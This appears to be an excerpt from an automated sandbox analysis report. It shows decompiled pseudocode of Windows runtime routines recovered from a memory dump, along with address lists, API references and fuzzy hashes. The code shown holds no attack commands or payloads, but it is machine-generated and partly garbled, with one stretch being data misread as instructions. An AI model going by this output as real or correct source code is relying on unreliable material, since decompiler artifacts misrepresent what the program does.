						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x01a0b94c
0x01a0b956
0x01a0b95c
0x01a0b95e
0x01a0b964
0x01a0b969
0x01a0b96d
0x01a0b96d
0x01a0b970
0x01a0b974
0x01a0b97a
0x01a0badf
0x01a0badf
0x01a0bae2
0x01a0bae4
0x01a0bae6
0x01a0baf0
0x01a52cb8
0x01a0baf6
0x01a0baf6
0x01a0baf6
0x01a0bafd
0x01a0bb1f
0x01a0bb1f
0x01a0baff
0x01a0bb00
0x01a0bb00
0x01a0bb03
0x01a0bb03
0x01a0bacb
0x01a0bacf
0x01a0bad0
0x01a0bad1
0x01a0badc
0x01a0badc
0x01a0b980
0x01a0b980
0x01a0b988
0x01a0b98b
0x01a0b98d
0x01a0b990
0x01a0b993
0x01a0b999
0x01a0b99b
0x01a0b9a1
0x01a0b9a5
0x01a0b9aa
0x01a0b9b0
0x01a0b9bb
0x01a0b9c0
0x01a0b9c3
0x01a0b9ca
0x01a0b9cc
0x01a0b9cf
0x01a0b9d3
0x01a0b9d7
0x01a0ba94
0x01a0ba94
0x01a0ba98
0x01a0baa3
0x01a52ccb
0x01a0baa9
0x01a0baa9
0x01a0baa9
0x01a0bab1
0x01a52cd5
0x01a52cdd
0x01a52cdd
0x01a0babb
0x01a0babc
0x01a0bac2
0x01a0bac3
0x01a0bac3
0x01a0bac6
0x00000000
0x01a0b9dd
0x01a0b9dd
0x01a0b9e7
0x01a0b9e7
0x01a0b9ec
0x01a0b9ec
0x01a0b9f1
0x01a0b9f5
0x01a0b9fa
0x01a0ba00
0x01a0ba0c
0x01a0ba10
0x01a0ba10
0x01a0ba12
0x01a0ba18
0x00000000
0x00000000
0x01a0bb26
0x01a0bb26
0x01a0ba1e
0x01a0ba1e
0x01a0ba23
0x01a0ba25
0x01a0ba2c
0x01a0ba30
0x01a0ba35
0x01a0ba35
0x01a0ba41
0x01a0ba46
0x01a0ba4c
0x01a0ba50
0x01a0ba54
0x01a0ba6a
0x01a0ba6e
0x01a0ba70
0x01a0ba74
0x01a0ba78
0x01a0ba7a
0x01a0ba7c
0x01a0ba8e
0x01a0ba90
0x01a0ba92
0x01a0bb14
0x01a0bb14
0x01a0bb16
0x01a0bb16
0x00000000
0x01a0ba7c
0x01a0bb0a
0x01a0bb0d
0x00000000
0x00000000
0x00000000
0x01a0bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A0B9A5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 583a3d17e38aabc1250a9d696dc019b122f118cc6c6fcc0fe16b998fdb19b703
Instruction ID: 9905bb54504d72945fb29403801670cf74c660fdbafb76b1084c9ac2b8e24052
Opcode Fuzzy Hash: 583a3d17e38aabc1250a9d696dc019b122f118cc6c6fcc0fe16b998fdb19b703
Instruction Fuzzy Hash: EE516A75A08741CFC722CF6DD280A2ABBF5FB88750F14496EE99587395D730E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019EB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E019EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1abf7a8);
				E01A3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E01A3D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E01A2D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E01A2F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L01A3DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E01A2B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E01A2B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E01A2E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E01A2A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x019eb171
0x019eb171
0x019eb171
0x019eb171
0x019eb171
0x019eb176
0x019eb17b
0x019eb180
0x019eb186
0x019eb18f
0x019eb198
0x019eb1a4
0x019eb1aa
0x01a44802
0x01a44802
0x01a44805
0x01a4480c
0x01a4480e
0x019eb1d1
0x019eb1d3
0x019eb1de
0x019eb1de
0x01a44817
0x01a4481e
0x01a44820
0x01a44822
0x01a44822
0x01a44824
0x01a44824
0x01a4482a
0x00000000
0x00000000
0x01a44835
0x01a4483a
0x01a4483d
0x01a4483f
0x01a44842
0x01a44842
0x01a44842
0x01a44846
0x01a4484c
0x01a4484e
0x01a44851
0x01a44851
0x01a44853
0x01a44854
0x01a44854
0x01a44858
0x01a4485a
0x01a4485a
0x01a4485d
0x01a4485f
0x01a44861
0x01a44861
0x01a44866
0x01a4486b
0x01a4486e
0x01a44871
0x01a44876
0x01a44876
0x01a44878
0x01a4487b
0x01a44884
0x01a44884
0x00000000
0x01a4487d
0x01a4487d
0x01a44882
0x01a44889
0x01a44889
0x01a4488f
0x01a44891
0x01a448e0
0x01a448e2
0x01a448e4
0x01a448e4
0x01a448e7
0x01a448e7
0x01a448ed
0x01a448f4
0x01a448f6
0x01a44951
0x01a44951
0x01a44953
0x01a44953
0x01a44956
0x01a44956
0x01a44958
0x01a44959
0x01a44959
0x01a4495d
0x01a4495d
0x01a4495f
0x01a4495f
0x01a44965
0x01a44969
0x01a449ba
0x01a449ba
0x01a449c1
0x01a449c5
0x01a449cc
0x01a449d4
0x01a449d7
0x01a449da
0x01a449e4
0x01a449e5
0x01a449f3
0x01a44a02
0x00000000
0x01a44a02
0x01a44972
0x01a44974
0x00000000
0x00000000
0x01a44976
0x01a44979
0x01a44982
0x01a44983
0x01a44984
0x01a4498b
0x01a4498d
0x01a44991
0x01a44993
0x01a44999
0x01a4499d
0x01a449a2
0x01a449a2
0x01a449a2
0x01a44999
0x01a449ac
0x00000000
0x01a449b3
0x01a448f8
0x01a448fe
0x00000000
0x00000000
0x00000000
0x01a448fe
0x01a44895
0x01a4489c
0x01a448ad
0x01a448b2
0x01a448b5
0x01a448b7
0x01a448ba
0x01a448bc
0x01a448c6
0x01a448c6
0x01a448cb
0x01a448d1
0x01a448d4
0x01a448d8
0x01a448d8
0x00000000
0x01a448d8
0x01a448be
0x01a448c0
0x00000000
0x00000000
0x01a448c2
0x00000000
0x00000000
0x00000000
0x01a448c4
0x00000000
0x01a44882
0x01a4487b
0x01a44904
0x01a44906
0x00000000
0x00000000
0x01a44908
0x01a4490e
0x00000000
0x00000000
0x01a44910
0x01a44917
0x01a44917
0x00000000
0x01a44917
0x019eb1ba
0x01a447f9
0x01a447fc
0x00000000
0x00000000
0x00000000
0x01a447fc
0x019eb1c0
0x019eb1c0
0x019eb1c3
0x019eb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 01A448AD

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b05e26f2458a26d1667e30bf290c5fdf9474743115f9cf2642c10cbd8c199dc9
Instruction ID: 4a2603403d8824ac060345bbfe00a1422cbfe69cbe709778e8db91daed8824ee
Opcode Fuzzy Hash: b05e26f2458a26d1667e30bf290c5fdf9474743115f9cf2642c10cbd8c199dc9
Instruction Fuzzy Hash: 6151E475D002598FEF32CF68C945BAEBBB0BF88714F1441ADD859EB282D7704941DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A12581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01A12581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200477, char _a1546912157) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				intOrPtr _t247;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				signed int _t280;
				signed int _t285;
				signed int _t287;
				void* _t289;
				void* _t290;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				void* _t299;
				signed int _t300;
				signed int _t304;
				intOrPtr _t316;
				signed int _t325;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				void* _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				void* _t343;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x1add360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t332 = 0x1adb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t285 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t325 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t333 = 0xc0000106;
						goto L32;
					} else {
						_t332 = L01A04620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t332;
						__eflags = _t332;
						if(_t332 == 0) {
							_t333 = 0xc0000017;
							goto L32;
						} else {
							 *(_t332 + 0x44) =  *(_t332 + 0x44) & 0x00000000;
							_t50 = _t332 + 0x48; // 0x48
							_t327 = _t50;
							_t314 = _v32;
							 *(_t332 + 0x3c) = _t285;
							_t287 = 0;
							 *((short*)(_t332 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t332 + 0x18) = _t327;
								__eflags = _t314 - 0x1ad8478;
								 *_t332 = ((0 | _t314 == 0x01ad8478) - 0x00000001 & 0xfffffffb) + 7;
								E01A2F3E0(_t327,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t327 = _t327 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E01A739F2(_t327);
									_t314 = _v32;
									_t327 = _t278;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t333 = _v68;
								__eflags = 0;
								 *((short*)(_t327 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t332 + _t287 * 4;
								_v56 = _t285;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t239 =  *(_v60 + _t298 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t298 * 4);
										 *(_t285 + 0x18) = _t327;
										_t243 =  *(_v60 + _t298 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M01A12959))) {
												case 0:
													__ax =  *0x1ad8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E01A2F3E0(__edi,  *0x1ad848c, __ax & 0x0000ffff);
														__eax =  *0x1ad8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E01A2F3E0(_t327, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x1ad8480 & 0x0000ffff = E01A2F3E0(__edi,  *0x1ad8484,  *0x1ad8480 & 0x0000ffff);
													__eax =  *0x1ad8480 & 0x0000ffff;
													__eax = ( *0x1ad8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E01A2F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E01A2F3E0(_t327, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t327 = _t327 + (_t273 >> 1) * 2 + 2;
													__eflags = _t327;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t327 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0x1ad575c;
													__eflags = __ebx - 0x1ad575c;
													if(__ebx != 0x1ad575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E01A2F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1ad575c;
														} while (__ebx != 0x1ad575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1ad8478 & 0x0000ffff = E01A2F3E0(__edi,  *0x1ad847c,  *0x1ad8478 & 0x0000ffff);
													__eax =  *0x1ad8478 & 0x0000ffff;
													__eax = ( *0x1ad8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E01A739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1ad6e58 & 0x0000ffff = E01A2F3E0(__edi,  *0x1ad6e5c,  *0x1ad6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1ad6e58 & 0x0000ffff;
													__eax = ( *0x1ad6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t280 =  *(_v60 + _t325 * 4);
						if(_t280 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t280 * 4 +  &M01A12935))) {
							case 0:
								__ax =  *0x1ad8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E01A12E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1ad8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1ad8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E019FEEF0(0x1ad79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E019FEB70(__ecx, 0x1ad79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t333;
												if(_t333 < 0) {
													L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1ad7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E019FEB70(__ecx, 0x1ad79a0);
										__eax = _v52;
										L36:
										_pop(_t326);
										_pop(_t334);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E01A2B640(_t218, _t286, _v8 ^ _t338, _t314, _t326, _t334);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t283 = E01A12E3E(_t281,  &_v36);
									_t294 = _v36;
									_v76 = _t283;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0x1ad5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1ad8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1ad8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1ad6e58 & 0x0000ffff;
								__eax = ( *0x1ad6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t325 = _t325 + 1;
								if(_t325 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t299 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) +  *0xa1262e01;
					_t247 =  *0xa1260501;
					 *_t327 =  *_t327 + _t285;
					_pop(_t289);
					asm("movsd");
					 *((intOrPtr*)(_t247 +  &_a1530200477)) =  *((intOrPtr*)(_t247 +  &_a1530200477)) + _t314;
					asm("movsd");
					 *_t314 =  *_t314 + _t247;
					 *((intOrPtr*)(_t299 - 0x5ed77fff)) =  *((intOrPtr*)(_t299 - 0x5ed77fff)) - _t341;
					_t335 = _t332 + _t332;
					asm("daa");
					 *((intOrPtr*)(_t335 + 0x28)) =  *((intOrPtr*)(_t335 + 0x28)) + _t299;
					_pop(_t290);
					asm("movsd");
					 *((intOrPtr*)( *0xa1275d01 + _t289 +  &_a1546912157)) =  *((intOrPtr*)( *0xa1275d01 + _t289 +  &_a1546912157)) + _t335;
					asm("movsd");
					_t343 = _t341 + _t299;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1abff00);
					E01A3D08C(_t290, _t327, _t335);
					_v44 =  *[fs:0x18];
					_t328 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t304 = _t255 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0x19c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E01A2E5C0(_a8,  *((intOrPtr*)(_t304 + 0x19c1668)), _t291);
									_t343 = _t343 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t336 = E01A651BE(_t291,  *((intOrPtr*)(_v48 + 0x19c166c)), _a16, _t328, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t328;
									if( *_t300 == _t328) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t316 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t316 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t300) {
											__eflags =  *(_t316 + 0x1c);
											if( *(_t316 + 0x1c) == 0) {
												L106:
												_t336 = E01A12AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t328 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t260 = E019F6600( *(_t316 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E01A12C50(_t300, _a8, _t291, _a16, _a20, _a24, _t328);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E019FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t267 = E01A12AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E01A12C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
									}
									_v8 = _t328;
									E01A12ACB();
								}
							}
						}
						L69:
